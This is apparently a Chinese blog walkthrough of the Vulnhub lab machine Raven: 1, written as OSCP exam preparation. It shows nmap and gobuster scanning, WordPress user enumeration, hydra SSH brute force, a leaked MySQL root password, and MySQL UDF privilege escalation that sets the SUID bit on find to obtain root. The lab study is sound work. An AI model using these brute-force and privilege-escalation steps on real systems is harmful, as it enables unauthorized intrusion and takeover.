OSCP备考_0x13_Vulnhub靶机_Raven: 1

Ethan医生4个月前靶场143
名称说明
靶机下载链接https://www.vulnhub.com/entry/raven-1,256/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.180

image.png

nmap -p- 192.168.233.180 

image.png

nmap -p22,80,111,54309 -A -T4 192.168.233.180


image.png

image.png

gobuster dir -u http://192.168.233.180/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40


image.png

image.png

查找到version是5.2.16版本

查询到cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./phpmail.py

然后修改phpmail.py配置 然后攻击目标机器

image.png


执行不成功 看来还是换打wd看看

wpscan --url http://192.168.233.180/wordpress/ -eu

image.png

找到两个用户尝试爆破看看

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.233.180 ssh


image.png

image.png

到wd底下去看MYSQL配置,密码:R@v3nSecurity

image.png

尝试登入看看

image.png

使用UDP提权 因为启用的ROOT MYSQL


mysql --version

mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3

上传恶意1518.so文件 进行UDF提权

create table ethan(line blob); (blob就是二进制保存)

image.png

insert into ethan value(load_file('/tmp/1518.so')); 将挡案导入到ethan

image.png

select * from ethan into dumpfile '/usr/lib/mysql/plugin/ethan.so'; 将挡案导出到plugin文件内

create function do_system returns integer soname 'ethan.so';

(是 MySQL UDF(用户自定义函数)提权利用的一部分,它的作用是:

告诉 MySQL 加载一个名为 ethan.so 的共享库文件,并将其中的某个函数注册为 SQL 中可以调用的函数 do_system)

image.png


select * from mysql.func;

image.png


调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令:
select do_system('chmod u+s /usr/bin/find');

image.png

find . -exec "id" \;

image.png

image.png



标签: OSCP

相关文章

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。